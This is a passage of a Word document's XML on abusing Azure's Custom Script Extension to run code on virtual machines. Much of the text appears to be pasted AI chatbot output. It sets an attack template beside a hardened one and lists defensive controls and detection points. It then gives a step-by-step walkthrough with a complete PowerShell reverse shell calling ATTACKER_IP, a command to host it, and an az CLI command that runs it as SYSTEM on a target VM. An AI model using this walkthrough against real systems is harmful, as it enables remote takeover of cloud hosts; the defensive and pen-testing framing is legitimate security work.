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2A90" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc226381632"/>
      <w:r w:rsidRPr="00B92848">
        <w:t>VM Command Execution via Custom Script Extension</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="7E7B94CD" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6608690B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🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacking Azure: VM Command Execution via Custom Script Extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB2AC7A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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408FAA39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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Custom Script Extension</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Azure Virtual Machines allows administrators to run scripts automatically on VM provisioning or update. While it’s a legitimate tool, attackers can abuse it post-compromise to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>execute arbitrary code with SYSTEM privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>, making it a high-value target during lateral movement and privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628227BE" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="363B9877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🔓</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack Scenario (Noncompliant Usage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2754CB0C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An attacker with sufficient privileges (e.g., Contributor role) can deploy a malicious extension to execute commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFE5F93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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA590E7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"type": "Microsoft.Compute/virtualMachines/extensions",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B4A331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"name": "CustomScriptExtension",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E56E42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"apiVersion": "2020-12-01",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C3C38C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"location": "&lt;vm-location&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1631CF71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"properties": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEFE604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"publisher": "Microsoft.Compute",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0157D144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"type": "CustomScriptExtension",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2103DED1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"typeHandlerVersion": "1.10",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C87CBD9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"autoUpgradeMinorVersion": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A41397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"settings": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6190828C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  "fileUris": ["https://malicious-site.com/malicious-script.ps1"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FED32A9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  "commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File malicious-script.ps1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BD7C9F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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0562CA17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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EF7E2B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C7F8BC" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>🔸</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Red Team Insight</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>This method executes unverified scripts as SYSTEM, effectively giving the attacker full control of the VM without needing RDP or SSH access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199E1838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6F687E75">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6113E09A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🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Defensive Best Practice (Compliant Usage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529C5FFE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To reduce abuse, organizations should enforce script integrity, restrict sources, and securely pass secrets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541B6A44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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC8881F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"type": "Microsoft.Compute/virtualMachines/extensions",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1AE9CD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"name": "CustomScriptExtension",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35881D76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"apiVersion": "2020-12-01",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DF165A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"location": "&lt;vm-location&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26695669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"properties": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3224BA36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"publisher": "Microsoft.Compute",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460868B5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"type": "CustomScriptExtension",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA5BF58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"typeHandlerVersion": "1.10",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AA79C6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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "autoUpgradeMinorVersion": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170E5C80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"settings": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFF5D7D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  "fileUris": ["https://secure-site.com/secure-script.ps1"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB246BA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  "commandToExecute": "powershell.exe -ExecutionPolicy RemoteSigned -File secure-script.ps1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514FF788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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D7EB76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"protectedSettings": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D70B32F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  "storageAccountName": "&lt;storage-account-name&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3796D716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  "storageAccountKey": "&lt;storage-account-key&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C625A2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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9E8BFF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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296D8ECE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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0C2E27" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Security Controls to Implement</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D538CA5" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict who can use VM extensions via </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure RBAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19478729" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to block execution from untrusted sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6818F4FA" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>RemoteSigned</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>AllSigned</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell execution policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207B06CB" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitor extension deployments using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Defender for Servers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Log Analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC069C5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16C82EDD">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A6841B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🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PenTest Takeaway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3926DBF9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Custom Script Extension abuse is a stealthy method to execute post-exploitation payloads. During an Azure assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D1A2F8" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Look for permissions to deploy or modify VM extensions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F65D0D2" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Use az vm extension set or ARM templates to simulate malicious deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6008E220" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Monitor for artifacts like unexpected scripts, base64 PowerShell in logs, or extensions with suspicious URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD7DDA9" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Key Detection Point</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Alert on Microsoft.Compute/virtualMachines/extensions/write operations in activity logs combined with public or unknown script sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275F75C9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18BA9E8B">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14366E3F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Would you like a command-line walkthrough of exploiting this using az CLI and crafting a test ARM template?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073032A5" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F13898E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Great — here's a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>step-by-step walkthrough</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of abusing the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Custom Script Extension</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to execute commands on an Azure VM using the az CLI. This simulates a post-compromise scenario where you've obtained </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Contributor</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or similar privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B90ED79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4A60EE32">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F2E91D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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE5D32D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Run a PowerShell reverse shell (or arbitrary command) on a target Azure VM by deploying a malicious Custom Script Extension.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E356CB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039EDABF">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09855D86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🧰</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prerequisites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C61A4DD" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az CLI authenticated to the target tenant/subscription.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FE9230" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Role with Microsoft.Compute/virtualMachines/extensions/write (e.g., Contributor or VM Contributor).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493AF2CF" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>VM name and resource group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7581D1F4" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Optionally, a web server to host your malicious script (e.g., Python HTTP server or Azure Blob URL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106066EB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003A780E">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5900CA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🪝</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 1: Create the Malicious Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8020CC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Create a basic reverse shell PowerShell script (example for educational purposes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6076FCA9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# reverse.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC7D555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$client = New-Object System.Net.Sockets.TCPClient("ATTACKER_IP", ATTACKER_PORT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404FF3F9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$stream = $client.GetStream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564F65FB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[byte[]]$bytes = 0..65535|%{0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0835CF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while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3905280E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$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DE8378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$sendback = (Invoke-Expression -Command $data 2&gt;&amp;1 | Out-String )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14665908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$sendback2 = $sendback + 'PS ' + (pwd).Path + '&gt; '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3572317E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$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E18157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$stream.Write($sendbyte,0,$sendbyte.Length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2BED40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  $stream.Flush()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763999D2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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACF0AF2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$client.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E3B0EC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Start a Python web server in the script directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2106FA65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python3 -m http.server 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C0B20F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5E1C5A12">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="327BBA39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⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 2: Deploy Custom Script Extension via az</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA3EF34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Replace the placeholders below and run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1C7734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az vm extension set \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6215F382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--resource-group &lt;RESOURCE_GROUP&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2BB876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--vm-name &lt;VM_NAME&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5078D5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--name CustomScriptExtension \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693867DB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--publisher Microsoft.Compute \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F52CA7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--version 1.10 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBED251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--settings '{"fileUris": ["http://YOUR-IP:8000/reverse.ps1"], "commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File reverse.ps1"}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36974A7D" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This will </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>execute reverse.ps1 as SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the target Windows VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651167D0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00B84C18">
